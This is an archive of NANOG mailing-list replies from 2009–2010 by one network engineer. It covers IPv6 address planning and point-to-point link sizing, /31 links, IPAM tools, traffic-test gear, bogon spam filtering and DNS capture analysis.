Cualquier consulta sobre este servicio, puede hacerla al correo electronico 
wh...@nic.ve
... etc.

I get a proper response, anyway.

There is no A record in the DNS for ve.whois-servers.net, which is what my 
client tries first. Perhaps this is where the confusion lies.

--
Nathan Ward


Re: ip address management

2010-02-03 Thread Nathan Ward
I'm actually writing some IP management code. Web based, it knows about the 
difference between IPv4 and IPv6 in maybe 3 or 4 places.
Intention is to release it publicly when it's good to go.

On 3/02/2010, at 10:14 AM, Scott Berkman wrote:

 I was about to suggest IPPlan, but it is lacking the V6 support.  Here is
 one I found doing some searching, but I haven't used it myself:
 
 http://sourceforge.net/projects/haci/
 
   -Scott
 
 -Original Message-
 From: Pavel Dimow [mailto:paveldi...@gmail.com] 
 Sent: Tuesday, February 02, 2010 3:55 PM
 To: nanog@nanog.org
 Subject: ip address management
 
 Hello,
 
 does anybody know what happened with ipat?
 
 http://nethead.de/index.php/ipat
 http://nanog.cluepon.net/index.php/Tools_and_Resources
 
 Any other suggestion for a good foss ip address management app with
 ipv6 support?


Re: How polluted is 1/8?

2010-02-03 Thread Nathan Ward
On 4/02/2010, at 9:19 AM, Justin M. Streiner wrote:

 I would hope that the APNIC would opt not to assign networks that would 
 contain 1.1.1.1 or 1.2.3.4 to customers for exactly that reason.  The 
 signal-to-noise ratio for those addresses is likely pretty high.  The noise 
 is likely contained on many internal networks for now because a corresponding 
 route doesn't show up in the global routing table at the moment.  Once that 
 changes

1.1.1/24 and 1.2.3/24 are assigned to APNIC. Unless they release them, the 
general public will not get addresses in these.

--
Nathan Ward


Re: Using /126 for IPv6 router links

2010-01-27 Thread Nathan Ward
On 28/01/2010, at 1:51 AM, Randy Bush wrote:

 the general intent of a class B allocation is that it is large enough
 for nearly everybody, with nearly everybody including all but the
 largest of organisations.
 That would, indeed, work if we weren't short of class B networks
 to assign.
 Would you clarify? Seriously?
 
 we used to think we were not short of class B networks

We also used to have a protocol with less total addresses than the population 
of the planet, let alone subnets.

In 2000::/3, assuming we can use 1 in every 4 /48s because, well, I'm being 
nice to your point, we still have 1300 /48s per person.
http://www.wolframalpha.com/input/?i=%28%282%5E45%29%2F4%29%2Fearth+population

And that's /48s.
What if say 50% of the address space is /48s and 50% of the address space is 
/56s?
Then we have 675,000 networks per person.

If we botch that up then we've done amazingly badly.
Then we'll move on to 4000::/3.

--
Nathan Ward




Re: Using /126 for IPv6 router links

2010-01-25 Thread Nathan Ward
On 26/01/2010, at 8:50 AM, Tim Durack wrote:

 This is what we have planned:
 
 2620::xx00::/41   AS-NETx-2620-0-xx00
 
   2620::xx00::/44 Infrastructure
 
     2620::xx01::/48 Pop1 Infrastructure
 
       2620::xx01:::/64      Router Loopback (2^64 x /128)
       2620::xx01:0001::/64  Transit net (2^48 x /112)
       2620::xx01:0002::/64  Server Switch management
       2620::xx01:0003::/64  Access Switch management
 
     2620::xx0f::/48 Pop16 Infrastructure

Why do you force POP infrastructure to be a /48? That allows you only 16 POPs 
which is pretty restrictive IMO.
Why not simply take say 4 /48s and sparsely allocate /56s to each POP and then 
grow the /56s if you require more networks at each POP.

You only have a need for 4 /64s at each POP right now, so the 256 that a /56 
gives you sounds like more than enough, and up to 1024 POPs (assuming you don't 
outgrow any of the /56s).

Also I'd strongly recommend not stuffing decimal numbers in to a hexadecimal 
field. It might seem like a good idea right now to make the learning curve 
easier, but it's going to make stuff annoying long term. You don't have 
anything in IPv4 that's big enough to indicate the VLAN number and you've lived 
just fine for years, so forcing it to be decimal like that isn't really needed.
You're much better off giving your staff the tools to translate between the 
two, rather than burn networks in order to fudge some kind of human readability 
out of it and sacrificing your address space to get it.

% printf "%04x\n" 4095
0fff
% printf "%d\n" 0x0fff
4095

--
Nathan Ward

Re: Using /126 for IPv6 router links

2010-01-24 Thread Nathan Ward

On 24/01/2010, at 5:28 PM, Leo Bicknell wrote:

 In a message written on Sat, Jan 23, 2010 at 01:52:21PM +0100, Mathias Seiler 
 wrote:
 I use a /126 if possible but have also configured one /64 just for the link 
 between two routers. This works great but when I think that I'm wasting 2^64 
 - 2 addresses here it feels plain wrong.
 
 So what do you think? Good? Bad? Ugly? /127 ? ;)
 
 I have used /126's, /127's, and others, based on peers preference.
 
 I personally have a fondness for /112's, as it gives you more than
 2 addresses, and a DNS bit boundary.
 
 For all the pontification about how there are enough /64's to number
 all the grains of sand, or other nonsense, I think that ignores too
 much operational information.
 
 rDNS is important, and becomes harder in IPv6.  Making it easier
 is important.
 
 Having a scan of a /64 fill your P2P T1 is poor design, all because
 you assigned 2^64 addresses to a link that will never have more
 than 2 functional devices.
 
 Most importantly, we should not let any vendor code any of these
 into software or silicon, in case we need to change later.

I too prefer /112s. I can take the first /64 in any assignment or allocation 
and set it aside for networking infrastructure.
The first /112 is for loopbacks, the remaining /112s are for linknets.

Then I can filter this /64 at my border, and it's easy.

You can do the same thing with /64 linknets, but then you have to set aside a 
block of them, and that might get hard if you have a /48 or something. Maybe 
not. What if you have a /56?

Maybe there is some value in linknets being effectively disposable so you never 
have to worry about problems coming from re-use. A single /64 full of /112s 
gives you 281 trillion.

For links to customers and other networks, I like /64s, because they are right 
now the standard so you're not going to run in to compatibility problems. If 
you've got links to customers you should have a /32, so setting aside a /48 or 
a /44 or something for those customer links is no huge drama.

--
Nathan Ward
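The infrastructure layout described above (first /64 set aside, first /112 for loopbacks, the rest for linknets, the whole /64 filtered at the border) as an added Python example, not code from the post or its author; the function names and the 2001:db8::/32 allocation are my assumptions.

```python
"""Carve loopbacks and /112 linknets out of the first /64 of an allocation,
and make the border-filter decision for that block. Constructed example."""
import ipaddress

LINKNET_LEN = 112


def infra_block(allocation):
    """The first /64 of the allocation is reserved for infrastructure."""
    return next(ipaddress.IPv6Network(allocation).subnets(new_prefix=64))


def infra_plan(allocation, n_linknets):
    """Return (infra /64, loopback /112, [linknet /112, ...]).

    The first /112 holds loopbacks (one address per router); the next
    n_linknets /112s are point-to-point links, handed out in order.
    """
    infra = infra_block(allocation)
    blocks = infra.subnets(new_prefix=LINKNET_LEN)
    loopbacks = next(blocks)
    linknets = [next(blocks) for _ in range(n_linknets)]
    return infra, loopbacks, linknets


def linknet_capacity(infra_len=64, link_len=LINKNET_LEN):
    """How many /link_len blocks fit in one /infra_len: 2**48 for /112s in a /64."""
    return 2 ** (link_len - infra_len)


def border_filter(dst, allocation):
    """Ingress decision at the border for a packet addressed to dst: drop
    anything aimed at the infrastructure /64, pass everything else."""
    if ipaddress.IPv6Address(dst) in infra_block(allocation):
        return "drop"
    return "pass"


def link_addresses(linknet):
    """The two router addresses on a /112 linknet (::1 and ::2), skipping the
    all-zeros subnet-router anycast address."""
    base = int(ipaddress.IPv6Network(linknet).network_address)
    return str(ipaddress.IPv6Address(base + 1)), str(ipaddress.IPv6Address(base + 2))


if __name__ == "__main__":
    infra, loops, links = infra_plan("2001:db8::/32", 3)
    print(f"infra {infra}, loopbacks {loops}, {linknet_capacity()} linknets possible")
    for link in links:
        print(link, "->", link_addresses(link))
```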


Re: Using /31 for router links

2010-01-22 Thread Nathan Ward
On 23/01/2010, at 1:31 PM, Jay Nugent wrote:

 Greetings,
 
 On Fri, 22 Jan 2010, Seth Mattinen wrote:
 
 In the past I've always used /30's for PTP connection subnets out of old 
 habit (i.e. Ethernet that won't take unnumbered) but now I'm considering 
 switching to /31's in order to stretch my IPv4 space further. Has anyone 
 else done this? Good? Bad? Based on the bit of testing I've done this 
 shouldn't be a problem since it's only between routers.
 
   Yes, this *IS* done *ALL* the time.  P-t-P means that there are ONLY
 two devices on the wire - hence point to point.  It ONLY uses two IP
 addresses (one on each end) and there is no reason or need to ARP on this
 wire.  So no need for a broadcast or network addresses - it is just the
 two end points.

ARP is still required on ethernet links, so that the MAC address can be 
discovered for use in the ethernet frame header. /31 does not change the 
behavior of ARP at all.

--
Nathan Ward




Re: 10Gbps Traffic Test Systems

2010-01-20 Thread Nathan Ward
I have used Ixia, Spirent AX/4000, Spirent Testcenter and Spirent Smartbits for 
1-10GE testing, they've all been able to do the things you ask for - they are 
quite basic features and any 10GE router tester unit will do what you want.

In addition, you should demand much higher than 10Kpps, you should be able to 
fit roughly 120Mpps of TCP SYN packets in to a 10GE ethernet pipe.

On 21/01/2010, at 11:04 AM, Brad Fleming wrote:

 I am in the market for 10Gbps traffic testers.
 
 Here are some of the things I'd like to have:
 1) Mixed packet sizes
 2) Ramp TCP sessions up/down quickly
 3) Many source and destination IPs
 4) Ability to ramp traffic up and down
 5) Simulate targeted SYN floods
 6) 10,000+ packets per second
 
 We'll use these devices to test throughput and resource utilization on 
 routers and firewalls/security systems. We'll also test and prove candidate 
 QoS configurations (ie: DSCP41 still works well even when DSCP11 is 
 saturating links).
 
 The catch is that I work for a charitable, non-profit with limited resources. 
 I understand you can't have steak on a sardine budget; I'm just trying to 
 find suggestions on a testing platform for thrifty customers! We do not 
 have any existing testing systems other than iPerf on a Mac Mini.
 
 Any suggestions, either on-list or off, are welcome and appreciated.
 
 Brad Fleming
 
 
 
 




Re: IPv6 allocations, deaggregation, etc.

2009-12-22 Thread Nathan Ward

The assumption that networks will filter /48s is not the whole story.

The RIRs giving out /48s do so from a single pool that only contains /48
assignments.
The RIRs give out /32s from a pool containing /32 or shorter prefixes
(ie /31, /30, etc. etc).


You will find that most networks filtering /48s allow them from the  
pool with only /48s in it.


The root DNS servers are in /48s.

If you can justify getting a /32, then I suggest you do so, but if not  
then don't worry, a /48 will work just fine. The networks that do  
filter you will pretty soon adapt I expect.


Insert routing table explosion religious war here, with snipes from  
people saying that we need a new routing system, etc. etc.


So with that in mind, do your concerns from your original post still  
make sense?


--
Nathan Ward



Re: IPv6 allocations, deaggregation, etc.

2009-12-22 Thread Nathan Ward

On 23/12/2009, at 3:52 PM, George Bonser wrote:

If you can justify getting a /32, then I suggest you do so, but if not
then don't worry, a /48 will work just fine. The networks that do
filter you will pretty soon adapt I expect.


I can't in good conscience justify a /32.  That is just too much space.
I believe I can, however, justify a separate /48 in Europe and APAC with
my various offices and data centers in that region coming from the /48
for that region.


I'm not sure it's about good conscience and worrying about address  
space wastage anymore. I mean sure, don't go ask for a /8 or  
something, but follow the RIR guidelines - don't paint yourself in to  
a corner later by trying to save the world now.
If you are assigning addresses to customers, you should have a /32  
allocation. If you are an end user of addresses, you should have a /48  
portable assignment. In APNIC world anyway, I'm not sure of the terms  
and policies used in other regions.


--
Nathan Ward



Re: IPv6 allocations, deaggregation, etc.

2009-12-22 Thread Nathan Ward

On 23/12/2009, at 4:04 PM, Shane Ronan wrote:

I'm not an expert, but can/should you advertise ARIN IP space on APNIC
or RIPE, etc ?  You are talking about having received ip space from
ARIN, tied to an ARIN AS I suppose it's probably more a matter of
form than anything else though.


This happens all the time with IPv4 space and AS #'s today, why  
would it be any different with v6?


It's not.

--
Nathan Ward



Re: Linux shaping packet loss

2009-12-08 Thread Nathan Ward

On 9/12/2009, at 4:47 AM, Tony Finch wrote:


Autoneg is a required part of the gig E specification so you'd only be
causing yourself trouble by turning it off. (I don't know if it'll also
break automatic MDI/MDI-X (crossover) configuration, for an example of
something that's nice to have.)


Yes it will break auto MDI/MDI-X.

--
Nathan Ward



Re: Consumer Grade - IPV6 Enabled Router Firewalls.

2009-12-02 Thread Nathan Ward

On 3/12/2009, at 12:44 PM, Wade Peacock wrote:


Matthew Dodd wrote:
Apple has been shipping the Airport Extreme and Express (consumer  
router) with v6 support since 2007, if I recall correctly. They can  
also create a 4to6 tunnel automatically.


By 4to6 to you mean IPv4 on the inside and IPv6 on the outside?


He is confused, and means 6to4.

Also the airport extreme does not do DHCPv6-PD or anything (as far as  
I know, they certainly did not last time I tried), so I don't know  
that we'd really call them an IPv6 CPE in the way that I suspect Wade  
means.


--
Nathan Ward



Re: DNS query analyzer

2009-11-30 Thread Nathan Ward

On 1/12/2009, at 1:06 PM, Joseph Jackson wrote:


Hey List!

Anyone know of a tool that can take a pcap file from wireshark that  
was used to collect dns queries and then spit out statistics about  
the queries such as RTT and timeouts?



Not off the top of my head, but, you could use wireshark's Lua  
extension system to write a plugin to do this for you right within  
wireshark.


The wireshark/Lua stuff is quite powerful (though not super super  
fast), it's a really useful tool to have on hand.


--
Nathan Ward
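The statistics Joseph asked for (per-query RTT and timeouts from a capture of DNS traffic) done as a stand-alone pcap parser in Python rather than as the Wireshark Lua plugin suggested above; this is an added example, not code from the post or its author. The pcap in the block is constructed inline (Ethernet/IPv4/UDP/DNS, checksums left zero) so it runs offline; the function names, the 2 s timeout and the 192.0.2.0/24 addresses are my assumptions.

```python
"""Per-query RTT and timeout statistics for DNS traffic in a libpcap file."""
import ipaddress
import struct


def build_pcap(packets):
    """Classic pcap (little-endian, linktype 1 = Ethernet) from [(ts, frame)]."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for ts, frame in packets:
        sec = int(ts)
        usec = int(round((ts - sec) * 1e6))
        out.append(struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame)
    return b"".join(out)


def dns_frame(src, dst, sport, dport, txid, response, qname=b"example.com"):
    """Ethernet/IPv4/UDP/DNS frame with one A question; checksums left zero."""
    flags = 0x8180 if response else 0x0100
    question = b"".join(bytes([len(l)]) + l for l in qname.split(b".")) + b"\x00\x00\x01\x00\x01"
    dns = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0) + question
    udp = struct.pack("!HHHH", sport, dport, 8 + len(dns), 0) + dns
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return bytes(12) + b"\x08\x00" + ip + udp


def parse_pcap(blob):
    """Yield (timestamp, frame) per record; honours either byte order."""
    endian = "<" if struct.unpack_from("<I", blob)[0] == 0xA1B2C3D4 else ">"
    off = 24
    while off + 16 <= len(blob):
        sec, usec, caplen, _ = struct.unpack_from(endian + "IIII", blob, off)
        off += 16
        yield sec + usec / 1e6, blob[off:off + caplen]
        off += caplen


def dns_fields(frame):
    """(src, sport, dst, dport, txid, is_response) or None if not IPv4/UDP/53."""
    if len(frame) < 14 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if len(ip) < ihl + 12 or ip[9] != 17:
        return None
    udp = ip[ihl:]
    sport, dport = struct.unpack("!HH", udp[:4])
    if 53 not in (sport, dport):
        return None
    txid, flags = struct.unpack("!HH", udp[8:12])
    src = str(ipaddress.IPv4Address(ip[12:16]))
    dst = str(ipaddress.IPv4Address(ip[16:20]))
    return src, sport, dst, dport, txid, bool(flags & 0x8000)


def dns_stats(blob, timeout=2.0):
    """Match answers to queries on (client, client port, server, txid).

    Returns (rtts, timeouts): RTTs in seconds for answers within `timeout`,
    and the keys of queries that were answered late or never.
    """
    pending, rtts, timeouts = {}, [], []
    for ts, frame in parse_pcap(blob):
        fields = dns_fields(frame)
        if fields is None:
            continue
        src, sport, dst, dport, txid, is_response = fields
        if not is_response:
            pending[(src, sport, dst, txid)] = ts       # a retry overwrites the first send
            continue
        key = (dst, dport, src, txid)
        sent = pending.pop(key, None)
        if sent is None:
            continue                                    # answer with no query in the capture
        rtt = ts - sent
        if rtt <= timeout:
            rtts.append(rtt)
        else:
            timeouts.append(key)
    timeouts.extend(pending)                            # never answered in the capture
    return rtts, timeouts


# Constructed capture: one 25 ms answer, one unanswered query, one 3 s (late) answer.
SAMPLE_PCAP = build_pcap([
    (1.000, dns_frame("192.0.2.10", "192.0.2.53", 40001, 53, 0x1234, False)),
    (1.025, dns_frame("192.0.2.53", "192.0.2.10", 53, 40001, 0x1234, True)),
    (2.000, dns_frame("192.0.2.10", "192.0.2.53", 40002, 53, 0x1235, False)),
    (3.000, dns_frame("192.0.2.10", "192.0.2.53", 40003, 53, 0x1236, False)),
    (6.000, dns_frame("192.0.2.53", "192.0.2.10", 53, 40003, 0x1236, True)),
])

if __name__ == "__main__":
    rtts, timeouts = dns_stats(SAMPLE_PCAP)
    print(f"{len(rtts)} answered, {len(timeouts)} timed out, RTTs (ms): "
          f"{[round(r * 1000, 1) for r in rtts]}")
```

To run it on a real capture, read the file into `blob` and call `dns_stats(blob)`; the txid plus client port pairing is the same matching Wireshark does for its `dns.time` field.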



Re: Speed Testing and Throughput testing

2009-11-02 Thread Nathan Ward

On 3/11/2009, at 10:56 AM, Mark Urbach wrote:

Anyone have a good solution to get accurate speed results when  
testing at 10/100/1000 Ethernet speeds?


If you want accuracy, you want to buy a packet generator/router tester  
unit.


I just built a tool for a customer (a last-mile network provider) that  
runs a series of iperf tests over several days, and generates a report.
iperf works well enough, but it seems to be much better when driven by  
humans, vs. driven by scripts.


I'm not aware of any free tools that do just ethernet frames.


Do you have a server/software that customer can test too?


Not sure what you're after here - do you want to host your own  
speedtest.net-like service so your customers can self-test their  
access links? Does this mean much, or should they be testing against a  
server outside your network?
Also, if you host your own service and you're talking about  
10/100/1000mbit connections, you might want to put something in place  
that prevents several people testing at once.


--
Nathan Ward



Re: dealing with bogon spam ?

2009-10-28 Thread Nathan Ward


On 29/10/2009, at 2:52 AM, Jeroen Massar wrote:


Randy Bush wrote:
It seems to me like the best solution might be a semi-hacky solution of
asking arin (and other IRR's) if i can copy its DB and creating an
internal peer which null routes unallocated blocks (updated nightly?)

What you want to take is:

$rirs = array(
    "afrinic" => "ftp://ftp.ripe.net/pub/stats/afrinic/delegated-afrinic-latest",

[..]

this is brilliant.  maybe we should form an org to do this and
distribute via bgp?  shall we have a contest for the name of the org?
my bid is cymru


Who have it already indeed for a long long time and have a proven track
record.

I noted the above for the people who want to get their own copy from the
IRRs, like what was asked above. For instance for the few who want to
build their own setups, want to integrate it in their own systems etc.


I can't see anything on their site that provides a BGP feed of  
prefixes allocated by RIRs, which I think is what we're talking about  
here.


--
Nathan Ward



Re: PPPoE vs. Bridged ADSL

2009-10-28 Thread Nathan Ward



Apologies if this message is brief, it is sent from my cellphone.

On 29/10/2009, at 11:33, Walter Keen walter.k...@rainierconnect.net wrote:


  Most aDSL modems if set to PPPoE (I think Actiontec's come this way by
  default) will send the mac as the pppoe un/pw.
  David E. Smith wrote:

Opinions on this? I'd be interested in hearing the latest real world
experience for both and the direction most folks are going in.

I can't speak to which would be better on copper specifically, but in
general I'd favor DHCP over PPPoE. Either way, most of the back-end stuff
will be similar (you'll need a way to authenticate users, turn them off and
on, et cetera); the differences won't be all that big. Either you're storing
their MACs in a database, or their port assignments and VLAN tags, or their
usernames and passwords.

With PPPoE, however, the end-user can't just plug in and go - they'll have
to configure their PC, or a DSL modem, or something. That means a phone call
to your tech support, most likely. In many cases, DHCP can lead to
plug-and-play simplicity, which means they don't have to call you, and you
don't have to answer their calls. Everyone wins. :)

David Smith
MVN.net


--


Walter Keen
Network Technician
Rainier Connect
(o) 360-832-4024
(c) 253-302-0194







Re: dealing with bogon spam ?

2009-10-27 Thread Nathan Ward

On 28/10/2009, at 12:57 PM, Leslie wrote:

First off, I'm not certain if unallocated space in blocks less than  
a /8 is properly called bogon, so pardon my terminology if I'm  
incorrect.


We're seeing a decent chunk of spam coming from an unallocated block  
of address space.  We use CYMRU's great list of /8 bogon space to  
prevent completely off the wall abuse, but the granularity stops at /8's.
Obviously, I've written the originating AS and its single
upstream provider (sadly without any response).  I'm not looking for  
a one time solution for this issue however -- I'd like to  
permanently block (and kick) anyone who's using unallocated space  
illegitimately.


How have you dealt with this issue? Does anyone publish a more  
granular listing of unallocated space? Does arin have this  
information somewhere other than just probing any given ip via whois?



You *might* be able to get a copy of the whois database as an  
optimisation so you don't have to hit their servers all the time -  
does that help?

I wouldn't rely on that though, but I don't see any other good options.
Perhaps you can only accept stuff from networks that you first saw an  
announcement for greater than 7 days ago, to prevent people popping up  
with a network for a day, spamming, and then disappearing? Likely to  
get lots of false positives in that though, and as soon as someone  
figures out your technique it's not going to work.


Religious war alert: does SIDR solve this? I guess only if you only  
accept signed advertisements.. I don't know if that is the intended  
default mode or not.. Need to do some reading I guess.


--
Nathan Ward
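The two "dealing with bogon spam" messages above describe the same defender-side check: build a list of RIR-allocated space from the delegated-* files (the `$rirs` array in Jeroen's snippet) and, as Nathan floats here, treat routes younger than about a week with suspicion. Both done in one added Python example, not code from either post or their authors; the delegated lines are constructed in the real file format, and the function names, the `first_seen` table, the label strings and the 7-day default are my assumptions.

```python
"""Allocated-space check from an RIR delegated-* file, plus a route-age check."""
import ipaddress
from datetime import date

# Constructed sample in delegated-extended format (a version line, a summary
# line, then records): registry|cc|type|start|value|date|status
SAMPLE_DELEGATED = """\
2|apnic|20091027|3|19830101|20091027|+1000
apnic|*|ipv4|*|3|summary
apnic|NZ|ipv4|203.0.113.0|256|20090101|allocated
apnic|AU|ipv4|198.51.100.0|256|20090102|assigned
apnic|*|ipv4|192.0.2.0|256|20090103|available
"""


def allocated_ipv4(text):
    """Sorted IPv4 networks whose status is allocated or assigned.

    For ipv4 records the value field is an address count, not a prefix
    length, so start + count - 1 is summarised into CIDR blocks. 'available'
    and 'reserved' ranges are deliberately left out: traffic sourced from
    them is the unallocated-space spam the thread is about.
    """
    nets = []
    for line in text.splitlines():
        fields = line.split("|")
        if len(fields) < 7 or fields[2] != "ipv4" or fields[6] not in ("allocated", "assigned"):
            continue
        start = ipaddress.IPv4Address(fields[3])
        end = start + int(fields[4]) - 1
        nets.extend(ipaddress.summarize_address_range(start, end))
    return sorted(nets)


def classify_source(ip, allocated, first_seen, today, min_age_days=7):
    """Label a sending IP against RIR data and route age.

    first_seen maps announced prefix -> date the route was first observed
    (from your own BGP collector; constructed in the test). The longest
    covering prefix is the one a router would use, so its age decides.
    Returns 'unallocated', 'not-routed', 'new-route' or 'ok'.
    """
    addr = ipaddress.IPv4Address(ip)
    if not any(addr in net for net in allocated):
        return "unallocated"
    covering = [(ipaddress.IPv4Network(p), seen) for p, seen in first_seen.items()
                if addr in ipaddress.IPv4Network(p)]
    if not covering:
        return "not-routed"
    _, seen = max(covering, key=lambda item: item[0].prefixlen)
    return "new-route" if (today - seen).days < min_age_days else "ok"


if __name__ == "__main__":
    allocated = allocated_ipv4(SAMPLE_DELEGATED)
    routes = {"203.0.113.0/24": date(2009, 10, 1), "203.0.113.0/25": date(2009, 10, 26)}
    for ip in ("192.0.2.5", "198.51.100.1", "203.0.113.9", "203.0.113.200"):
        print(ip, classify_source(ip, allocated, routes, date(2009, 10, 27)))
```

The age check carries the false-positive caveat Nathan gives it: a legitimately new customer prefix looks exactly like a pop-up route for its first week, so "new-route" is a score input, not a block decision.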



Re: Power Analysis/Management Tools

2009-10-27 Thread Nathan Ward
I haven't used cacti in a while, but does it let you combine several  
RRD files in to one graph? If so that's useful for power stuff,  
because you're likely to want to graph an aggregate of several things  
across different devices - for example a+b power of a server, or  
aggregate power usage for one customer with multiple power feeds.


Note that RRD has some cool stuff that cacti can't use by default,  
including the aberrant behavior detection functionality - that's  
probably quite useful for power and environmental stuff..


On 27/10/2009, at 5:05 PM, Bill Blackford wrote:


Same. Cacti

-b

On Mon, Oct 26, 2009 at 2:33 PM, Greg Whynott  
greg.whyn...@oicr.on.cawrote:


I'd think SNMP will be what any product uses to query APC gear, even their
own suite uses SNMP to collect information and receive traps.
We use cacti to graph our loads on the APC power bars and UPS gear, gives
you everything you need on all phases/legs, was there something in
particular you were after?

-g


-Original Message-
From: Brandon Galbraith [mailto:brandon.galbra...@gmail.com]
Sent: Monday, October 26, 2009 4:59 PM
To: nanog@nanog.org
Subject: Power Analysis/Management Tools

Not to go too off-topic, but if there is a more preferred location for me
to ask, please let me know. I'm looking for recommendations on open source
packages that people are using for monitoring power utilization of their
network/server gear.

We're using Cacti currently, pulling the data from APCs via SNMP, and I
wanted to check if someone had come across a better method before I
reinvented the wheel.





--
Bill Blackford
Network Engineer








Re: dealing with bogon spam ?

2009-10-27 Thread Nathan Ward

On 28/10/2009, at 2:00 PM, Suresh Ramasubramanian wrote:


Having been postmastering at various places for about a decade, I have
seen that too - yes.  But cymru style filtering means its kind of out
of fashion now.


Sure, if the prefix is within something that cymru call a bogon.

If it's within a current RIR pool, not so much.

--
Nathan Ward



Re: dealing with bogon spam ?

2009-10-27 Thread Nathan Ward

On 28/10/2009, at 2:20 PM, Church, Charles wrote:

This is puzzling me.  If it's from non-announced space, at some  
point some router should report no route to it.  How is the TCP  
handshake performed to allow a sync to turn into spam?


Unallocated is not the same as unannounced.





Re: Simple Change Management Tracking

2009-10-26 Thread Nathan Ward

On 27/10/2009, at 12:11 AM, Paul Stewart wrote:
We ran RT for a while but every time a new update came out on CentOS  
it broke the installation (perl mods), making it a pain to keep  
running.  Bugzilla we haven't tried nor the JIRA.  I'll take a  
look... does JIRA have an approval process or some type?


I suggest sticking with RT.

I run RT on CentOS by maintaining a separate Perl libs dir for the  
cpan modules that are required by RT and keeping it separate from the  
OS managed stuff, it works very well.


--
Nathan Ward




Re: Consistent asymetric latency on monitoring?

2009-10-21 Thread Nathan Ward

On 22/10/2009, at 2:31 PM, Perry Lorier wrote:

I assume this product works by having a packet with a timestamp sent  
from the source to the destination where it is timestamped again and  
either sent back, or another packet is sent in the other direction.   
The difference between the two timestamps gives you the latency in  
that direction.


I believe a packet is sent, and the target router responds with a  
timestamp.


But yeah, timestamps are being compared.

I'm with Perry though - sounds like your clocks are drifting.

--
Nathan Ward



Re: IPv6 Allocations

2009-10-19 Thread Nathan Ward

On 20/10/2009, at 9:01 AM, Esposito, Victor wrote:


Since there is a lot of conversation about IPv6 flying about, does
anyone have a document or link to a good high level allocation structure
for v6?

It seems there are 100 different ways to sub allocate the /32, and I am
trying to find a simple but scalable method... .


This discussion has been done a bunch of times.

Here is my scheme, which has been adopted (sometimes with small  
modifications) by quite a few providers I have spoken with.

http://mailman.nanog.org/pipermail/nanog/2009-August/012681.html

Read the whole thread because there was a bit of confusion.

--
Nathan Ward



Re: ISP customer assignments

2009-10-19 Thread Nathan Ward

On 20/10/2009, at 3:02 PM, Bill Stewart wrote:


plus want the ability to take their address
space with them when they change ISPs (because there are too many
devices and applications that insist on having hard-coded IP addresses
instead of using DNS, and because DNS tends to get cached more often
than you'd sometimes like.


That's why we have Unique Local Addresses.

--
Nathan Ward



Re: ISP customer assignments

2009-10-19 Thread Nathan Ward


On 20/10/2009, at 3:10 PM, bmann...@vacation.karoshi.com wrote:


On Tue, Oct 20, 2009 at 03:07:39PM +1300, Nathan Ward wrote:

On 20/10/2009, at 3:02 PM, Bill Stewart wrote:


plus want the ability to take their address
space with them when they change ISPs (because there are too many
devices and applications that insist on having hard-coded IP addresses
instead of using DNS, and because DNS tends to get cached more often
than you'd sometimes like.


That's why we have Unique Local Addresses.



but Nathan,  they are only statistically unique.


Sure, but I don't think that changes my point.

Also if you want to increase your chances of uniqueness (which are  
already pretty good if you're not using subnet 0 or 1 or whatever) you  
can jump on to somewhere on the sixxs site and announce that you're  
using a specific ULA prefix.


--
Nathan Ward
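"Only statistically unique" is exactly how RFC 4193 defines ULAs: the 40-bit Global ID is the low bits of a SHA-1 over an NTP timestamp and an EUI-64, and the RFC's own analysis is a birthday bound on collisions. The generation algorithm and that bound as an added Python example, not code from the post or its author; the function names are mine, the MAC in the test is constructed, and the deterministic time parameter exists only so the result can be checked.

```python
"""RFC 4193 section 3.2.2 ULA prefix generation and the collision estimate."""
import hashlib
import ipaddress
import math
import struct
import time
import uuid

NTP_EPOCH_OFFSET = 2208988800           # seconds between 1900-01-01 and 1970-01-01


def eui64_from_mac(mac_bytes):
    """EUI-64 from a 48-bit MAC: insert ff:fe and flip the U/L bit (RFC 4291 App. A)."""
    eui = bytearray(mac_bytes[:3] + b"\xff\xfe" + mac_bytes[3:])
    eui[0] ^= 0x02
    return bytes(eui)


def ntp_timestamp(unix_time):
    """64-bit NTP format: seconds since 1900 in the high 32 bits, fraction below."""
    secs = (int(unix_time) + NTP_EPOCH_OFFSET) & 0xFFFFFFFF
    frac = int((unix_time - int(unix_time)) * (1 << 32)) & 0xFFFFFFFF
    return struct.pack("!II", secs, frac)


def ula_prefix(mac_bytes, unix_time):
    """RFC 4193 3.2.2: key = NTP time || EUI-64; Global ID = low 40 bits of
    SHA-1(key); prefix = fd00::/8 (fc00::/7 with L=1) || Global ID, a /48."""
    key = ntp_timestamp(unix_time) + eui64_from_mac(mac_bytes)
    global_id = hashlib.sha1(key).digest()[-5:]
    return ipaddress.IPv6Network((b"\xfd" + global_id + bytes(10), 48))


def fresh_ula_prefix():
    """What a site would actually run: this host's MAC and the clock now."""
    return ula_prefix(uuid.getnode().to_bytes(6, "big"), time.time())


def collision_probability(n):
    """Birthday-bound chance that any two of n independently generated
    40-bit Global IDs collide (the RFC 4193 section 3.2.3 style estimate)."""
    return 1 - math.exp(-n * (n - 1) / (2 * 2 ** 40))


if __name__ == "__main__":
    print("generated:", fresh_ula_prefix())
    for n in (2, 1000, 10000):
        print(f"P(collision among {n} sites) = {collision_probability(n):.3e}")
```

Subnet numbers within the /48 are chosen by the site, which is why Nathan's "not subnet 0 or 1" remark matters for the odds of two merged networks clashing; the Global ID itself is what the hash makes unique.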




Re: IPv6 Deployment for the LAN

2009-10-18 Thread Nathan Ward

On 18/10/2009, at 9:03 PM, Andy Davidson wrote:

I don't know the history of the process that led to DHCPv6 ending up  
crippled, and I have to admit that it's not clear how I signal this  
and to whom, but for the avoidance of doubt: this operator would  
like his tools back please.  Support default-routing options for  
DHCPv6 !


I think what you really want is an on-link prefix option in DHCPv6. Or  
at least, you'd need that as well as a default router option.


As I've said before, RA does not mean SLAAC. DO NOT use the two words  
interchangeably.


We have two address configuration mechanisms, RA is the transport for  
one (SLAAC) and is the hint to use another (DHCPv6 stateful).

The use of RA does NOT require the use of either mechanism.
Without RA, we don't know which to use, without manual configuration.  
I for one don't want to have to fool around every time I move to a new  
